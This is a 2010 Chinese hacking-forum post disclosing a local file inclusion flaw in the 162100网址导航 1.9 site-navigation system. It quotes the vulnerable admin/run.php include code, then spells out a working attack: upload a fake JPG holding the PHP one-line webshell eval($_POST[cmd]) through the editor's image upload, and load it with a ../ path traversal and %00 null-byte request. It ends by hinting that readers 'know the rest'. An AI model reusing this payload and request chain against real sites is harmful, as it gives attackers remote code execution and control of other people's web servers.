标题:
162100网址导航1.9本地文件包含漏洞
[打印本页]
作者:
晓谛
时间:
2010-11-6 18:31
标题:
162100网址导航1.9本地文件包含漏洞
162100网址导航1.9本地文件包含漏洞
发布日期:2010-10.27
发布作者:陆羽
影响版本:162100网址导航1.9
官方地址:
www.162100.com
漏洞类型:文件包含
漏洞描述:162100网址导航系统1.9存在本地文件包含漏洞,利用上传功能,上传图片木马可执行脚本获取网站webshell.
漏洞分析:admin 目录下 run.php 文件部分代码如下:
<?php if($_REQUEST['run'] && file_exists('./run/'.$_REQUEST['run'].'.php')) require_once('./run/'.$_REQUEST['run'].'.php'); //这里判断只要文件存在,就可以包含,未做任何限制,可目录跳转,所以,只要能上传文件,然后%00截断,即可上传 else alert('命令错误或功能尚未开通!','./index.html'); ?> 我找到上传目录
editor/index.html
使用上传图片功能,上传一个1.jpg 内容为 <?php eval($_POST[cmd])?>
获得地址editor/images/upload/2010102718265325.jpg
然后admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00
就是一个一句话了。。。剩下的你懂的。。。
我就传一个phpinfo示意下吧。。。
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2